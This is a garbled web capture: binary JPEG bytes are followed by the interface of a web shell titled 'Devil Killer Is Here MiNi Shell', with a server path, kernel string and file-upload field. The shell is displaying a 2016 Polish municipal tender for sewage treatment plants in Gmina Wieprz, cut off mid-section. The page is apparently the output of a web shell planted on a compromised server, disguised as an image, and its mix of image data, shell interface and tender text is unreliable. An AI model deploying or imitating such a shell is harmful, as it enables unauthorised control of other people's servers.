JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160125/16726-N-2016.html

<p class="kh_header"><b>Wieprz: Dostawa  i montaż przydomowych  oczyszczalni ścieków  dla Gminy Wieprz</b><br>
<b>Numer ogłoszenia: 16726 - 2016; data zamieszczenia: 25.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wieprz , ul. Centralna 5, 34-122 Wieprz, woj. małopolskie, tel. 33 8755118, faks 33 8755100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wieprz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  i montaż przydomowych  oczyszczalni ścieków  dla Gminy Wieprz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są :
1)	Roboty budowlane, w rozumieniu art. 3 ust.7 Ustawy oraz ustawy z dnia 7 lipca 1994r. Prawo budowlane polegające na wybudowaniu 124 biologicznych oczyszczalni ścieków (PBOŚ) przy gospodarstwach indywidualnych oraz budynkach użyteczności publicznej (wyposażeniu nieruchomości)  w Gminie Wieprz wg zestawienia podanego w specyfikacji .
2)	PBOŚ - należy przez to rozumieć Przydomowe Biologiczne Oczyszczalnie Ścieków, w treści SIWZ zwane również w skrócie oczyszczalnią, zbiornikiem lub zespołem urządzeń. Przydomowa biologiczna oczyszczalnia ścieków (PBOŚ) to urządzenie lub zespół urządzeń, w których na drodze procesów mechanicznych, biologicznych i chemicznych następuje redukcja ładunku zanieczyszczeń w ściekach do wielkości dopuszczalnych określonych w Rozporządzeniu MŚ z dnia 18 listopada 2014r w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego (Dz.U. z dnia 16 grudnia 2014r. poz. 1800) jak dla oczyszczani poniżej 2000 RLM wg Załącznika Nr 1 do ww. aktu wykonawczego.  
3)	Zamówienie zostało podzielone na cztery zadania  (podział uwzględniający termin złożenia dokumentacji projektowej w siedzibie Zamawiającego):
Zadanie Nr 1 - 109  szt. oczyszczalni -  pozycje  wyszczególnione  w  załączniku do formularza  ofertowego dla zadania Nr 1 (zał. 1A)
Zadanie Nr 2 - oczyszczalnia ścieków w miejscowości Nidek - decyzja pozwolenie na budowę  608/2015 - formularz ofertowy dla zadania Nr 2 (zał. 1B)
Zadanie Nr 3 - oczyszczalnia ścieków w miejscowości Gierałtowice- decyzja pozwolenie na budowę  606/2015- formularz ofertowy dla zadania Nr 3 (zał. 1C)
Zadanie Nr 4 - 13 szt. oczyszczalni -  pozycje  wyszczególnione  w  załączniku do formularza  ofertowego dla zadania Nr 4 (zał. 1D).
Zamawiający informuje, że priorytet w realizacji przewidziany jest dla Zadania Nr 1 i w przypadku braku posiadania wystarczających środków zastrzega możliwość unieważnienia całego postępowania lub jego części  (jednego lub kilku zadań).
4)	Wykonanie prac  projektowych (nie dotyczy zadania Nr 2 i Nr 3) polegających na analizie zastosowanych w projektach rozwiązań odprowadzania oczyszczonych ścieków (powierzchni chłonnej) i w przypadku zaistnienia  konieczności,  dokonanie zmian  w  dokumentacji (dokumentacja zamienna)  wraz  ze zmianą w kontekście przepisów prawa budowlanego. Weryfikacja powierzchni na podstawie wykonanych badań geologicznych.  Zamawiający dopuszcza możliwość zastosowania równoważnych (zamiennych do widniejących w projektach) sposobów odprowadzania oczyszczonych ścieków lecz muszą  one być oparte na systemach rozsączenia w gruncie. W zakres prac projektowych wchodzi także zmiana (aktualizacja) projektu budowlanego w przypadku różnic  wynikających     z zaoferowanych urządzeń,  a urządzeń zamieszczonych w projektach. 
W szczególnych przypadkach Zamawiający dopuszcza konieczność ponowienia zgłoszenia robót budowlanych przez Wykonawcę.  
5)	Dokonanie  rozruchu technologicznego każdej oczyszczalni, indywidualne  przeszkolenie  użytkowników w zakresie obsługi urządzeń i instalacji oczyszczalni,  a także  przekazanie  im instrukcji obsługi (DTR) oraz  wykonanie badań  w zakresie skuteczności oczyszczania dla ilości sztuk zamontowanych oczyszczalni wymaganych dla poszczególnych zadań  wg poniższego wykazu  (wymagane są badania oczyszczonych ścieków wykonane przez akredytowane laboratorium, lokalizacje oczyszczalni do badań wskazuje Zamawiający): 
Zadanie Nr 1 - 11 badań (11 oczyszczalni) w całym okresie gwarancyjnym dla urządzenia wg oferty. 
Zadanie Nr 2 i Zadanie Nr 3 - zgodnie z warunkami pozwolenia wodno prawnego (rozdział II) w całym okresie udzielonej gwarancji  wg oferty. 
Zadanie Nr 4 - 3  badania (3 oczyszczalnie) w całym okresie gwarancyjnym dla urządzenia wg oferty.
Zamawiający dopuszcza składanie ofert częściowych. 
6)	Uporządkowanie placu budowy do stanu pierwotnego (wywóz nadmiaru gruntu, niwelacja terenu).
7)	Protokolarne przekazanie  wykonanych   oczyszczalni władającym  nieruchomościami objętymi inwestycją (wszystkie formularze należy uzgodnić z Zamawiającym). 
8)	Obsługa geodezyjna inwestycji.
9)	Obsługa w zakresie sporządzania badań i pomiarów przeprowadzonych przez uprawnione osoby  lub podmioty,  niezbędnych do odbioru urządzenia (instalacji)  w tym badania instalacji elektrycznej;
10)	Inwentaryzacja geodezyjna -  powykonawcza obiektów (w 2 egz.) .
11)	Sporządzenie  i przedłożenie  dokumentacji odbiorowej  powykonawczej  (w 2 egz.).
12)	Dla zadania Nr 2 i zadania Nr 3 dokonanie zgłoszenia rozpoczęcia i zakończenia budowy oraz  wykonanie wszystkich nakazów wynikających z posiadanych decyzji (pozwolenie na budowę oraz pozwolenie wodno prawne), odbiorów oraz decyzji w tym uzyskanie czynnego  pozwolenia na użytkowanie.
13)	Jako oczyszczalnie  Zamawiający rozumie kompletny  zespół urządzeń wraz   z infrastrukturą (zasilanie  energetyczne, sieć kanalizacyjna i inne- wg projektów)  niezbędnych  do odbioru ścieków   z budynku, oczyszczenia, odprowadzenia w określony sposób, opartych na indywidualnych przydomowych oczyszczalniach  ścieków zgodnych z indywidualnie wykonanymi   projektami..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy dotychczasowemu Wykonawcy robót budowlanych w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 30% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień .</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.24.21-9, 45.23.13.00-8, 45.25.21.27-4, 45.26.26.40-9, 45.11.12.00-0, 45.31.00.00-3, 45.23.11.10-9, 45.23.24.10-9, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający wymaga wniesienia wadium w wysokości: Zadanie Nr 1 - 20 000 zł. (dwadzieścia tysięcy złotych) Zadanie Nr 2 - wadium nie jest wymagane Zadanie Nr 3 - wadium nie jest wymagane Zadanie Nr 4 - 3000 zł. (trzy  tysiące złotych) w jednej lub kilku następujących formach: 1)pieniądzu, 2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; 3)gwarancjach bankowych, 4)gwarancjach ubezpieczeniowych, 5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju   Przedsiębiorczości. 2.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego ING Bank Śląski Nr 92 1050 1100 1000 0022 7925 7394  z opisem : WADIUM - Dostawa  i montaż przydomowych  oczyszczalni ścieków dla Gminy Wieprz, zadanie Nr ....( można dokonać jednej łącznej wpłaty na kilka zadań). 3. Do oferty zaleca się  dołączyć oryginał lub kserokopię przelewu potwierdzoną za zgodność z oryginałem. 4.O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wyznaczonym terminie decyduje data i godzina wpływu środków na rachunek Zamawiającego. Wadium musi znajdować się na koncie Zamawiającego w terminie składania ofert. 5.W przypadku wniesienia wadium w pozostałych dopuszczalnych formach, określonych w ust.1, do oferty należy dołączyć oryginał dokumentu potwierdzający wniesienie wadium ( bez wpinania do oferty). Zaleca się dołączyć do oferty kserokopię dokumentu, o którym mowa powyżej, poświadczoną za zgodność z oryginałem przez Wykonawcę. Zamawiający zwracając wadium w trybie art. 46 ustawy Prawo zamówień publicznych zwróci Wykonawcy oryginał dokumentu wadium a w dokumentacji przetargowej zostanie poświadczona za zgodność z oryginałem kserokopia zwróconego dokumentu. Wykonawca zostanie wykluczony z niniejszego postępowania a jego oferta zostanie odrzucona, jeżeli jego oferta przed upływem terminu składania ofert nie zostanie zabezpieczona wadium w wymaganej wysokości lub  wybranej formie spośród możliwych wymienionych w ust.1. 6.Wadium winno obejmować cały okres związania ofertą.7.Zamawiający przechowa a następnie dokona zwrotu lub zatrzyma wadium zgodnie z warunkami określonymi w art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu.
Ocena spełniania warunków udziału w postępowaniu będzie prowadzona na zasadzie spełnia -nie spełnia, na podstawie treści złożonych oświadczeń i dokumentów. Z treści dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże , że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 roboty budowlane polegające na montażu przydomowych oczyszczalni ścieków o wartości brutto nie mniejszej niż: 
dla zadania Nr 1 : 800 000 zł brutto każda z robót 
dla zadania Nr 2 : 40 000 zł brutto każda z robót 
dla zadania Nr 3 : 40 000 zł brutto każda z robót
dla zadania Nr 4 : 100 000 zł brutto każda z robót,
potwierdzone dokumentami , że roboty zostały wykonane w sposób należyty oraz wskazującymi, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Ocena spełniania warunków udziału w postępowaniu będzie prowadzona na zasadzie spełnia-nie spełnia, na podstawie treści złożonych oświadczeń i dokumentów. Z treści dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w zakresie dysponowania odpowiednim potencjałem technicznym na podstawie złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu.Ocena spełniania warunków udziału w postępowaniu będzie prowadzona na zasadzie spełnia-nie spełnia, na podstawie treści złożonych oświadczeń i dokumentów. Z treści dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek dysponowania osobami zdolnymi do wykonania zamówienia w sytuacji, kiedy wykaże że dysponuje co najmniej:1 osobą, która posiada uprawnienia budowlane do kierowania robotami budowlanymi (zgodnie z art. 12. ust. 1 i ust 2 ustawy prawo budowlane)   w specjalności instalacyjnej w zakresie sieci instalacji wodociągowych  i kanalizacyjnych oraz 1 osobą, która posiada uprawnienia (zgodnie z art. 12. ust. 1 i ust 2 ustawy prawo budowlane)   do projektowania w specjalności  instalacyjnej w zakresie co najmniej sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych .
Ocena spełniania warunków udziału w postępowaniu będzie prowadzona na zasadzie spełnia-nie spełnia, na podstawie treści złożonych oświadczeń i dokumentów. Z treści dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż:
Dla zadania Nr 1 : 600 000 zł (sześćset   tysięcy złotych)
Dla zadania Nr 2 : 40 000 zł (czterdzieści   tysięcy złotych)
Dla zadania Nr 3 : 40 000 zł (czterdzieści   tysięcy złotych)
Dla zadania Nr 4 : 80 000 zł (osiemdziesiąt tysięcy złotych).
Ocena spełniania warunków udziału w postępowaniu będzie prowadzona na zasadzie spełnia- nie spełnia, na podstawie treści złożonych oświadczeń i dokumentów. Z treści dokumentów musi jednoznacznie wynikać, iż ww. warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
